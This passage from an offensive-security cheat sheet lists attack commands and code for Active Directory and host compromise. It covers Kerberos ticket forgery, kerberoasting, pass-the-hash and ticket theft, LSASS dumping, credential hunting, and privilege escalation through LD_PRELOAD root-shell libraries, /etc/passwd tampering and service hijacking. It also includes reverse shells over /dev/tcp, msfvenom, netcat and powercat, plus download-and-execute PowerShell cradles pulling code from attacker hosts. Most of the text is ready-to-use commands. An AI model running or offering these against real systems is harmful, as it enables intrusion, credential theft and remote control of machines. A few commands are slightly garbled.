on the user's behalf to the second service the user needs to connect to. This second service will have themsDS-AllowedToDelegateTo
attribute given to it. User tokens can be forwarded to thoseSPN's
which have this attribute given.
Delegation occurs not only for the specified service, but also for ANY service running under the account that is running the service.
Unconstrained Delegation
Kerberos Delegation allows for users to access resources on another server via a service that the user has access to. The service the user is connected to impersonates that user by resusing his credentials which then allows the user to gain access to that server.
- When
Unconstrained Delegation
is enabled, the user'sTGT
is sent along with theTGS
to the first hop service. ThatTGT
gets stored in the server'sLSASS
which allows the service to take it out and delegate with it if necessary. - Accounts or services with
Unconstrained Delegation
can be escalated to an account with higher privileges, if a Domain Admin or a higher privileged user connecting to that machine. - The
TGT
can be extracted and the ticketreused
.
Resource-based Constrained Delegation (RBCD)
https://blog.netwrix.com/2022/09/29/resource-based-constrained-delegation-abuse/
- In
unconstrained
andconstrained Kerberos delegation
, acomputer/user
is told what resources it can delegate authentications to. - In
Resource-based Kerberos Delegation
, computers (resources) specify who theytrust
and who candelegate
authentications to them. - By supporting constrained delegation across domains,
services
can beconfigured
to useconstrained delegation
toauthenticate
toservers
in other domains rather than using unconstrained delegation. - This provides
authentication support
for across domain service solutions by using an existing Kerberos infrastructurewithout
needing to trustfront-end services
to delegate to any service.
Prerequisites
- Populate the
msDS-AllowedToActOnBehalfOfOtherIdentity
attribute with a computer account that will be controlled. - Know a
SPN
set on the object to gain access. - Create a new
computer account
using PowerMad (allowed due to the default MachineAccountQuota value). - Leverage Rubeus to abuse
Resource-Based Constrained Delegation
.
Kerberoasting
- All user accounts that have
Service Principal Names (SPN's)
set can be kerberoasted. - Relatively silent technique because it leaves only one
4769 ID event
on the log.
AS-REP Roasting
ASPREPRoast is about retrieving crackable hashes from KRB5 AS-REP
responses for users without kerberoast preauthentication
enabled. This isn't as useful as Kerberoasting, as accounts have to have DONT_REQ_PREAUTH
explicitly set for them to be vulnerable and you are still reliant upon weak password complexity for the attack to work.
AS-REP roasting
is a technique that allows retrieving password hashes for users that haveDo not require Kerberos preauthentication
property selected.- Those hashes can then be cracked offline.
Silver, Golden and Diamond Tickets
- Silver Ticket is a forged service authentication ticket (Service Principal Name (SPN) and Machine Account Keys (Hash in RC4 or AES) needed). Silver Tickets do not touch the Domain Controller (DC).
- Golden Ticket is a Ticket Granting Ticket (TGT) and completely forged offline (KRBTGT Account Hash needed).
- Diamond Ticket is essentially a Golden Ticket but requested from a Domain Controller (DC).
Attacking Kerberos
https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
Bruteforce
$ ./kerbrute -domain <DOMAIN> -users <FILE> -passwords <FILE> -outputfile <FILE>
With List of Users
C:\> .\Rubeus.exe brute /users:<FILE> /passwords:<FILE> /domain:<DOMAIN> /outfile:<FILE>
Check Passwords for all Users in Domain
C:\> .\Rubeus.exe brute /passwords:<FILE> /outfile:<FILE>
ASPREPRoast
Check ASPREPRoast for all Domain Users (Credentials required)
$ impacket-GetNPUsers <DOMAIN>/<USERNAME>:<PASSWORD> -request -format hashcat -outputfile <FILE>
$ impacket-GetNPUsers <DOMAIN>/<USERNAME>:<PASSWORD> -request -format john -outputfile <FILE>
Check ASPREPRoast for a List of Users (No Credentials required)
$ impacket-GetNPUsers <DOMAIN>/ -usersfile <FILE> -format hashcat -outputfile <FILE>
$ impacket-GetNPUsers <DOMAIN>/ -usersfile <FILE> -format john -outputfile <FILE>
Check ASPREPRoast for all Domain Users in Domain
C:\> .\Rubeus.exe asreproast /format:hashcat /outfile:<FILE>
Kerberoasting
$ python GetUserSPNs.py <DOMAIN>/<USERNAME>:<PASSWORD> -outputfile <FILE>
C:\> .\Rubeus.exe kerberoast /outfile:<FILE>
PS C:\> iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
PS C:\> Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII <FILE>
PS C:\> Invoke-Kerberoast -OutputFormat john | % { $_.Hash } | Out-File -Encoding ASCII <FILE>
Overpass The Hash/Pass The Key (PTK)
Request TGT with Hash
$ impacket-getTGT <DOMAIN>/<USERNAME> -hashes <LMHASH>:<NTLMHASH>
Request TGT with aesKey (More secure Encryption, probably more stealth due is it used by Default)
$ impacket-getTGT <DOMAIN>/<USERNAME> -aesKey <KEY>
Request TGT with Password
$ impacket-getTGT <DOMAIN>/<USERNAME>:<PASSWORD>
Set TGT for Impacket Usage
$ export KRB5CCNAME=<USERNAME>.ccache
Execute Remote Commands
$ impacket-psexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
$ impacket-smbexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
$ impacket-wmiexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
Ask and inject the Ticket
C:\> .\Rubeus.exe asktgt /domain:<DOMAIN> /user:<USERNAME> /rc4:<NTLMHASH> /ptt
Execute a CMD on Remote Host
C:\> .\PsExec.exe -accepteula \\<RHOST> cmd
Pass The Ticket (PTT)
Harvest Tickets from Linux
Check Type and Location of Tickets
$ grep default_ccache_name /etc/krb5.conf
- If none return, default is FILE:/tmp/krb5cc_%{uid}
- In Case of File Tickets it is possible to Copy-Paste them to use them
- In Case of being KEYRING Tickets, the Tool tickey can be used to get them
- To dump User Tickets, if root, it is recommended to dump them all by injecting in other user processes
- To inject, the Ticket have to be copied in a reachable Folder by all Users
$ cp tickey /tmp/tickey
$ /tmp/tickey -i
Harvest Tickets from Windows
mimikatz # sekurlsa::tickets /export
$ .\Rubeus dump
Convert Tickets dumped with Rubeus into base64
[IO.File]::WriteAllBytes("<TICKET>.kirbi", [Convert]::FromBase64String("<TICKET>"))
Convert Tickets between Linux and Windows Format with ticket_converter.py
$ python ticket_converter.py ticket.kirbi ticket.ccache
$ python ticket_converter.py ticket.ccache ticket.kirbi
Using Ticket on Linux
$ export KRB5CCNAME=<USERNAME>.ccache
Execute Remote Commands by using TGT
$ impacket-psexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
$ impacket-smbexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
$ impacket-wmiexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
Using Ticket on Windows
Inject Ticket with mimikatz
mimikatz # kerberos::ptt <KIRBI_FILE>
Inject Ticket with Rubeus
C:\> .\Rubeus.exe ptt /ticket:<KIRBI_FILE>
Execute a CMD on Remote Host
C:\> .\PsExec.exe -accepteula \\<RHOST> cmd
Silver Ticket
Impacket Examples
Generate TGS with NTLM
$ python ticketer.py -nthash <NTLMHASH> -domain-sid <SID> -domain <DOMAIN> -spn <SPN> <USERNAME>
Generate TGS with aesKey
$ python ticketer.py -aesKey <KEY> -domain-sid <SID> -domain <DOMAIN> -spn <SPN> <USERNAME>
Set the ticket for impacket use
$ export KRB5CCNAME=<USERNAME>.ccache
Execute Remote Commands by using TGT
$ impacket-psexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
$ impacket-smbexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
$ impacket-wmiexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
mimikatz Examples
Generate TGS with NTLM
mimikatz # kerberos::golden /domain:<DOMAIN>/sid:<SID> /rc4:<NTLMHASH> /user:<USERNAME> /service:<SERVICE> /target:<RHOST>
Generate TGS with AES 128bit Key
mimikatz # kerberos::golden /domain:<DOMAIN>/sid:<SID> /aes128:<KEY> /user:<USERNAME> /service:<SERVICE> /target:<RHOST>
Generate TGS with AES 256bit Key (More secure Encryption, probably more stealth due is it used by Default)
mimikatz # kerberos::golden /domain:<DOMAIN>/sid:<SID> /aes256:<KEY> /user:<USERNAME> /service:<SERVICE> /target:<RHOST>
Inject TGS with Mimikatz
$ mimikatz # kerberos::ptt <KIRBI_FILE>
##3## Rubeus Examples
C:\> .\Rubeus.exe ptt /ticket:<KIRBI_FILE>
Execute CMD on Remote Host
C:\> .\PsExec.exe -accepteula \\<RHOST> cmd
Golden Ticket
Impacket Examples
Generate TGT with NTLM
$ python ticketer.py -nthash <KRBTGT_NTLM_HASH> -domain-sid <SID> -domain <DOMAIN> <USERNAME>
Generate TGT with aesKey
$ python ticketer.py -aesKey <KEY> -domain-sid <SID> -domain <DOMAIN> <USERNAME>
Set TGT for Impacket Usage
$ export KRB5CCNAME=<USERNAME>.ccache
Execute Remote Commands by using TGT
$ impacket-psexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
$ impacket-smbexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
$ impacket-wmiexec <DOMAIN>/<USERNAME>@<RHOST> -k -no-pass
mimikatz Examples
Generate TGT with NTLM
mimikatz # kerberos::golden /domain:<DOMAIN>/sid:<SID> /rc4:<KRBTGT_NTLM_HASH> /user:<USERNAME>
Generate TGT with AES 128bit Key
mimikatz # kerberos::golden /domain:<DOMAIN>/sid:<SID> /aes128:<KEY> /user:<USERNAME>
Generate TGT with AES 256bit Key (More secure Encryption, probably more stealth due is it used by Default)
mimikatz # kerberos::golden /domain:<DOMAIN>/sid:<SID> /aes256:<KEY> /user:<USERNAME>
Inject TGT with Mimikatz
mimikatz # kerberos::ptt <KIRBI_FILE>
Rubeus Examples
Inject Ticket with Rubeus
C:\> .\Rubeus.exe ptt /ticket:<KIRBI_FILE>
Execute CMD on Remote Host
C:\> .\PsExec.exe -accepteula \\<RHOST> cmd
Get NTLM from Password
$ python -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "<PASSWORD>".encode("utf-16le")).digest())'
Krbrelayx
Abuse DNS Delegation Zones with dnstool.py
$ python3 dnstool.py -u 'domain\<USERNAME>' -p '<PASSWORD>' -a add -r '<TO_ABUSE>.<DOMAIN>' -d <LHOST> <RHOST>
LAPS
PS C:\Users\<USERNAME>\Documents> $Computers = Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd,ms-Mcs-AdmPwdExpirationTime
PS C:\Users\<USERNAME>\Documents> $Computers | Sort-Object ms-Mcs-AdmPwdExpirationTime | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-Adm-PwdExpirationTime
LDAP
Queries
$ (New-Object adsisearcher((New-Object adsi("LDAP://dc.<DOMAIN>.local","<DOMAIN>\<USERNAME>","<PASSWORD>")),"(objectCategory=Computer)")).FindAll() | %{ $_.Properties.name }
$ (New-Object adsisearcher((New-Object adsi("LDAP://dc.<DOMAIN>.local","<DOMAIN>\<USERNAME>","<PASSWORD>")),"(info=*)")).FindAll() | %{ $_.Properties }
ldapsearch
$ ldapsearch -x -h <RHOST> -s base namingcontexts
$ ldapsearch -D <USERNAME> -H ldap://<RHOST> -w "<PASSWORD>" -b "CN=Users,DC=contoso,DC=local" | grep info
$ ldapsearch -x -b "dc=<DOMAIN>,dc=local" "*" -h <RHOST> | awk '/dn: / {print $2}'
$ ldapsearch -x -D "cn=admin,dc=<DOMAIN>,dc=local" -s sub "cn=*" -h <RHOST> | awk '/uid: /{print $2}' | nl
$ ldapsearch -D "cn=admin,dc=acme,dc=com" "(objectClass=*)" -w ldapadmin -h ldap.acme.com
$ ldapsearch -x -h <RHOST> -D "<USERNAME>" -b "dc=<DOMAIN>,dc=local" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
$ ldapsearch -x -w <PASSWORD>
$ ldapsearch -H ldap://<DOMAIN> -b "DC=<DOMAIN>,DC=local" > <FILE>.txt
LD_PRELOAD
https://www.hackingarticles.in/linux-privilege-escalation-using-ld\_preload/
shell.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setresuid(0,0,0);
system("/bin/bash -p");
}
or
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}
Compiling
$ gcc -o <SHARED_OBJECT>.so <FILE>.c -shared -FPIC -nostartfiles
Privilege Escalation
$ sudo LD_PRELOAD=/PATH/TO/SHARED_OBJECT/<SHARED_OBJECT>.so <BINARY>
LD_LIBRARY_PATH
Get Information about Libraries
$ ldd /PATH/TO/BINARY/<BINARY>
shell.c
#include <stdio.h>
#include <stdlib.h>
static void hijack() __attribute__((constructor));
void hijack() {
unsetenv("LD_LIBRARY_PATH");
setresuid(0,0,0);
system("/bin/bash -p");
}
Compiling
$ gcc -o <LIBRARY>.so.<NUMBER> -shared -fPIC <FILE>.c
Privilege Escalation
$ sudo LD_LIBRARY_PATH=/PATH/TO/LIBRARY/<LIBRARY>.so.<NUMBER> <BINARY>
Linux
adduser.sh
#!/bin/bash
echo '<USERNAME>:BP9vDdYHNP.Mk:0:0:root:/root:/bin/bash' >> /etc/passwd
capsh
$ capsh --print
Linux Wildcards
https://www.defensecode.com/public/DefenseCode\_Unix\_WildCards\_Gone\_Wild.txt
With the command touch -- --checkpoint=1
will be a file created. Why? Because the --
behind the command touch
is telling touch, that there's option to be wait for. Instead of an option, it creates a file, named --checkpoint=1
.
$ touch -- --checkpoint=1
or
$ touch ./--checkpoint=1
So after creating the --checkpoint=1
file, i created another file, which executes a shell script.
$ touch -- '--checkpoint-action=exec=sh shell.sh'
or
$ touch ./--checkpoint-action=exec=<FILE>
To delete a misconfigured file, put a ./
in front of it.
$ rm ./'--checkpoint-action=exec=python script.sh'
logrotten
Skeleton Payload
if [ `id -u` -eq 0 ]; then ( /bin/sh -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1 ); fi
Syntax
If "create"-option is set in logrotate.cfg
$ ./logrotten -p ./payloadfile /tmp/log/pwnme.log
If "compress"-option is set in logrotate.cfg
$ ./logrotten -p ./payloadfile -c -s 4 /tmp/log/pwnme.log
Lsass
Dump
C:\> tasklist
C:\> rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 688 C:\Users\Administrator\Documents\lsass.dmp full
Lua
Code Execution
file = io.open("/root/.ssh/authorized_keys", "w")
file:write("ssh-rsa AAAAB3N--- snip ---YM5syQ==")
file:close()
machinectl
$ machinectl shell --uid=root
Microsoft Windows
Common Commands
C:\> tasklist /SVC
C:\> sc query
C:\> sc qc <SERVICE>
C:\> netsh firewall show state
C:\> schtasks /query /fo LIST /v
C:\> findstr /si password *.xml *.ini *.txt
C:\> dir /s *pass* == *cred* == *vnc* == *.config*
C:\> accesschk.exe -uws "Everyone" "C:\Program Files"
C:\> wmic qfe get Caption,Description,HotFixID,InstalledOn
C:\> driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
Adding Users to Groups
C:\> net user <USERNAME> <PASSWORD> /add /domain
C:\> net group "Exchange Windows Permissions" /add <USERNAME>
C:\> net localgroup "Remote Management Users" /add <USERNAME>
Enable Remote Desktop (RDP)
C:\> reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
C:\> netsh advfirewall firewall set rule group="remote desktop" new enable=yes
or
PS C:\> Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0;
PS C:\> Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name "UserAuthentication" -Value 1;
PS C:\> Enable-NetFirewallRule -DisplayGroup "Remote Desktop";
Hashes
https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4
- LM Hashes are deprecated and so there are replaced by an empty string (aad3b435b51404eeaad3b435b51404ee).
- If a
Hash
starts with31d6
, chances are pretty good, that there is noPassword
set for the user.
LM
Oldest
password storage used byMicrosoft Windows
- If available, they can be obtained from
SAM
databases on aMicrosoft Windows
system or from theNTDS
database of aDomain Controller
- When dumping
SAM/NTDS
databases, they are shown together within theNTHash
before the colon - Can be used for
Pass-The-Hash
Example
299BD128C1101FD6
Algorithm
- Convert all
lower case
toupper case
- Pad password to
14
characters with NULL characters - Split the password to two
7
character chunks - Create two
DES
keys from each7
character chunk - DES
encrypt
the string "KGS!@#$%" with these twochunks
Concatenate
the two DES encrypted strings. This is the LM hash.
Cracking
$ john --format=lm <FILE>
$ hashcat -m 3000 -a 3 <FILE>
NTHash (NTLM)
- The way how passwords are stored on
modern
Microsoft Windows
systems - Can be optained by dumping the
SAM
database or usingmimikatz
- They are also stored in the
NTDS
file onDomain Cotnrollers
- Can be used for
Pass-The-Hash
Example
B4B9B02E6F09A9BD760F388B67351E2B
Algorithm
MD4(UTF-16-LE(password))
Cracking
$ john --format=nt <FILE>
$ hashcat -m 1000 -a 3 <FILE>
Net-NTLMv1 (NTLMv1)
NTLM
protocol uses theNTHash
inChallenge-Response
between aserver
and aclient
- The
v1
of the protocol uses both, theNT
hash and theLM
hash, depending on configuration and what is available. - Can be obtained by using
Responder
- Values for cracking are
K1
,K2
orK3
from the algorithm - Version 1 is
deprecated
but still used in some old systems on the network - Can be used for
Relaying
Example
u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c
Algorithm
C = 8-byte server challenge, random
K1 | K2 | K3 = LM/NT-hash | 5-bytes-0
response = DES(K1,C) | DES(K2,C) | DES(K3,C)
Cracking
$ john --format=netntlm <FILE>
$ hashcat -m 5500 -a 3 <FILE>
Net-NTLMv2 (NTLMv2)
- New and improved version of the
NTLM
protocol - Harder to crack
- Same concept as
NTLMv1
, only with a different algorithm and response sent to the server - Can also be captured by using
Responder
- Default in Microsoft Windows since
Microsoft Windows 2000
- Can be used for
Relaying
Example
admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030
Algorithm
SC = 8-byte server challenge, random
CC = 8-byte client challenge, random
CC* = (X, time, CC2, domain name)
v2-Hash = HMAC-MD5(NT-Hash, user name, domain name)
LMv2 = HMAC-MD5(v2-Hash, SC, CC)
NTv2 = HMAC-MD5(v2-Hash, SC, CC*)
response = LMv2 | CC | NTv2 | CC*
Cracking
$ john --format=netntlmv2 <FILE>
$ hashcat -m 5600 -a 3 <FILE>
Privileges and Permissions
AlwaysInstallElevated
C:\> reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
C:\> reg query HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
$ msfvenom -p windows/meterpreter/reverse_tcp lhost=<LHOST> lport=<LPORT> âf msi > <FILE>.msi
C:\> msiexec /quiet /qn /i <FILE>.msi
Registry Handling
Enable Colored Output
C:\> reg add HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1
Then open a new Terminal Window.
Check for Auto Run Programs
C:\> reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Get Registry Key Information
C:\> req query <REGISTRY_KEY>
Modify Registry Key
C:\> reg add <REGISTRY_KEY> /v <VALUE_TO_MODIFY> /t REG_EXPAND_SZ /d C:\PATH\TO\FILE\<FILE>.exe /f
Search the Registry for Passwords
C:\> req query HKLM /f password /t REG_SZ /s
C:\> req query HKCU /f password /t REG_SZ /s
Searching for Credentials
Unattended Windows Installations
Potential Files containing Passwords
C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
Search for Passwords
C:\> dir .s *pass* == *.config
C:\> findstr /si password *.xml *.ini *.txt
PowerShell History
C:\> type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Saved Windows Credentials
C:\> cmdkey /list
C:\> runas /savecred /user:<USERNAME> cmd.exe
IIS Configuration
C:\> type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
PuTTY
C:\> reg query HKEY_CURRENT_USER\Software\<USERNAME>\PuTTY\Sessions\ /f "Proxy" /s
Service Handling
C:\> sc.exe create <SERVICE_NAME>
C:\> sc start <SERVICE_NAME>
C:\> sc qc <SERVICE_NAME>
Tasks & Services
Scheduled Tasks
C:\> schtasks
C:\> schtasks /query /tn <TASK> /fo list /v
C:\> schtasks /run /tn <TASK>
PS C:\> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
Unquoted Service Paths
Search for Unquoted Service Paths
by using sc qc
.
C:\> sc qc
C:\> sc qc WindowsScheduler
C:\> sc stop WindowsScheduler
C:\> sc start WindowsScheduler
C:\> icacls <PROGRAM>.exe
C:\> icacls C:\PROGRA~2\SYSTEM~1\<SERVICE>.exe
C:\> icacls C:\PROGRA~2\SYSTEM~1\<SERVICE>.exe /grant Everyone:F
Insecure Service Permissions
C:\> accesschk64.exe -qlc <SERVICE>
C:\> icacls C:\Users\<USERNAME>\<FILE>.exe /grant Everyone:F
C:\> sc config <SERVICE> binPath= "C:\Users\<USERNAME>\<FILE>.exe" obj= LocalSystem
C:\> sc stop <SERVICE>
C:\> sc start <SERVICE>
SeBackup and SeRestore Privilege
Backup SAM and SYSTEM Hashes
C:\> reg save hklm\system C:\Users\<USERNAME>\system.hive
C:\> reg save hklm\sam C:\Users\<USERNAME>\sam.hive
Dumping Hashes
$ secretsdump.py -sam sam.hive -system system.hive LOCAL
Pass the Hash
$ psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94 administrator@<RHOST>
SeTakeOwnership Privilege
C:\> takeown /f C:\Windows\System32\Utilman.exe
C:\> icacls C:\Windows\System32\Utilman.exe /grant Everyone:F
C:\Windows\System32\> copy cmd.exe utilman.exe
Click the Ease of Access
button on the logon screen to get a shell with NT Authority\System
privileges.
SeImpersonate and SeAssignPrimaryToken Privilege
C:\> .\RogueWinRM.exe -p "C:\> .\nc64.exe" -a "-e cmd.exe <LHOST> <LPORT>"
WMIC
C:\> wmic product get name,version,vendor
Microsoft Windows Defender
Check Whitelisted Paths
PS C:\> reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths"
Malicious Test String
PS C:\> $str = 'amsiinitfailed'
Minimalistic Offensive Security Tools
https://github.com/InfosecMatter/Minimalistic-offensive-security-tools
port-scan-tcp.ps1
PS C:\> IEX(New-Object Net.WebClient).DownloadString('http://<RHOST>/port-scan-tcp.ps1')
PassTheCert
https://offsec.almond.consulting/authenticating-with-certificates-when-pkinit-is-not-supported.html
https://github.com/AlmondOffSec/PassTheCert/tree/main/Python
$ certipy-ad cert -pfx <CERTIFICATE>.pfx -nokey -out <CERTIFICATE>.crt
$ certipy-ad cert -pfx <CERTIFICATE>.pfx -nocert -out <CERTIFICATE>.key
$ python3 passthecert.py -domain '<DOMAIN>' -dc-host '<DOMAIN>' -action 'modify_user' -target '<USERNAME>' -new-pass '<PASSWORD>' -crt ./<CERTIFICATE>.crt -key ./<CERTIFICATE>.key
$ evil-winrm -i '<RHOST>' -u '<USERNAME>' -p '<PASSWORD>'
Path Variable Hijacking
Finding accessible SUID Files
$ find / -perm -u=s -type f 2>/dev/null
Find writeable Paths
$ find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
Add current Directory
$ export PATH=$(pwd):$PATH
Binary File
$ cd /tmp
$ vi <FILE>
$ chmod +x ./<FILE>
$ PATH=$(pwd):$PATH <SUID_FILE>
pika
Remote Code Execution (RCE)
#!/usr/bin/env python
import pika
credentials = pika.PlainCredentials('<USERNAME>', '<PASSWORD>')
parameters = pika.ConnectionParameters('<LHOST>',5672,'/',credentials)
connection = pika.BlockingConnection(parameters)
channel = connection.channel()
channel.basic_publish(exchange='', routing_key='plugin_data', body='http://127.0.0.1:9001/<SCRIPT>')
connection.close()
Ping Sweep
On a Linux Operating System
$ for ip in {1..254}; do (ping -c 1 <XXX.XXX.XXX>.${ip} | grep "bytes from" | grep -v "Unreachable" &); done;
On a Windows Operating System
PS C:\> 1..255 | ForEach-Object { $ip = "<XXX.XXX.XXX>.$_"; if (Test-Connection -ComputerName $ip -Count 1 -Quiet) { $ip } }
With Meterpreter
meterpreter > (for /L %a IN (1,1,254) DO ping /n 1 /w 1 <XXX.XXX.XXX>.%a) | find "Reply"
PKINITtools
$ python3 gettgtpkinit.py -cert-pfx <USERNAME>.pfx -dc-ip <RHOST> <DOMAIN>/<USERNAME> <USERNAME>.ccache
$ export KRB5CCNAME=<USERNAME>.ccache
$ python3 getnthash.py <DOMAIN>/<USERNAME> -key 6617cde50b7ee63faeb6790e84981c746efa66f68a1cc3a394bbd27dceaf0554
plotting
Exploit race condition on linux by swapping file paths between 2 files very quickly (normal file, symlink to root owned file, swap, swap ,swap).
#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/fs.h>
int main(int argc, char *argv[]) {
while (1) {
syscall(SYS_renameat2, AT_FDCWD, argv[1], AT_FDCWD, argv[2], RENAME_EXCHANGE);
}
return 0;
}
Port Scanning
On a Linux Operating System
$ nc -zv 127.0.0.1 1-65535 | grep succeeded
$ for port in {1..65535}; do echo > /dev/tcp/<RHOST>/$port && echo "$port open"; done 2>/dev/null
On a Windows Operating System
PS C:\> 1..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect("<RHOST>",$_)) "$_ port open"} 2>$null
PoshADCS
PS C:\> curl http://<LHOST>/ADCS.ps1 | iex
PS C:\> Get-SmartCardCertificate -Identity Administrator -TemplateName Web -NoSmartCard -Verbose
PS C:\> gci cert:\currentuser\my -recurse
powercat
PS C:\> powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<LHOST>/powercat.ps1');powercat -c <LHOST> -p <LPORT> -e cmd"
File Transfer
$ impacket-smbserver local . -smb2support
PS C:\> Import-Module .\powercat.ps1
PS C:\> powercat -c <LHOST> -p 445 -i C:\PATH\TO\FILE\<FILE>
Powermad
PS C:\> Import-Module ./Powermad.ps1
PS C:\> $secureString = convertto-securestring "<PASSWORD>" -asplaintext -force
PS C:\> New-MachineAccount -MachineAccount <NAME> -Domain <DOMAIN> -DomainController <DOMAIN> -Password $secureString
PowerShell Constrained Language Mode (CLM)
PS C:\> Get-ApplockerPolicy -Effective -xml
PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Bypass Test
PS C:\> $a = Get-ApplockerPolicy -effective
PS C:\> $a.rulecollections
Bypass
PS C:\> $ExecutionContext.SessionState.LanguageMode
PS C:\> IEX(New-Object Net.WebClient).DownloadString('http://<RHOST>/<FILE>.ps1')
PS C:\> powershell -version 2
Example
PS C:\> IEX(New-Object Net.WebClient).DownloadString('http://<RHOST>/Invoke-Rubeus.ps1'); Invoke-Rubeus.ps1
PowerSploit
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
Import
PS C:\> Import-Module .\PowerView.ps1
or
PS C:\> iex(new-object net.webclient).downloadstring('http://<LHOST>/PowerView.ps1')
Set Credentials
PS C:\> $SecPass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
PS C:\> $cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\LDAP', $SecPass)
Example
PS C:\> Get-DomainUser -Credential $cred -DomainController dc.<DOMAIN>
PowerView
https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
PS C:\> curl http://<LHOST>/PowerView.ps1 | iex
PRET
$ ./pret.py
$ ./pret.py <printer fqdn> ps // pjl
<RHOST>:/> ls
<RHOST>:/> cd
<RHOST>:/> get
<RHOST>:/> nvram dump
procdump
PS C:\> .\procdump64.exe -accepteula -ma <PID>
PS C:\> type <FILE>.dmp | Select-String "username="
pspy
$ pspy64 -f
$ pspy64 -pf -i 1000
pth-toolkit
$ pth-smbclient --user=<USERNAME> --pw-nt-hash -m smb3 \\\\<RHOST>\\<USERNAME> <HASH>
pwncat
Common Commands
(local) pwncat$ back // get back to shell
Ctrl+d // get back to pwncat shell
$ pwncat-cs -lp <LPORT>
(local) pwncat$ download /PATH/TO/FILE/<FILE> .
(local) pwncat$ upload /PATH/TO/FILE/<FILE> /PATH/TO/FILE/<FILE>
Python
System Shell
$ python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Python Library Hijacking
https://rastating.github.io/privilege-escalation-via-python-library-hijacking/
https://medium.com/@klockw3rk/privilege-escalation-hijacking-python-library-2a0e92a45ca7
Get the current Path
$ python3 -c 'import sys;print(sys.path)'
remoteshell.py
import os
os.system("nc -lnvp <LPORT> -e /bin/bash")
Include Path
$ sudo -E PYTHONPATH=$(pwd) /opt/scripts/admin_tasks.sh 6
rpcclient
LDAP
$ rpcclient -U "" <RHOST>
Queries
srvinfo
netshareenum
netshareenumall
netsharegetinfo
netfileenum
netsessenum
netdiskenum
netconnenum
getanydcname
getdcname
dsr_getdcname
dsr_getdcnameex
dsr_getdcnameex2
dsr_getsitename
enumdomusers
enumdata
enumjobs
enumports
enumprivs
queryuser <USERNAME>
Rubeus
Overpass the Hash
PS C:\> Rubeus.exe kerberoast /user:<USERNAME>
Pass the Hash
PS C:\> .\Rubeus.exe asktgt /user:Administrator /certificate:7F052EB0D5D122CEF162FAE8233D6A0ED73ADA2E /getcredentials
.NET Reflection
Example
$ base64 Rubeus.exe -w0 > <FILE>.txt
PS C:\> $RubeusAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String((new-object net.webclient).downloadstring('http://<RHOST>/<FILE>.txt')))
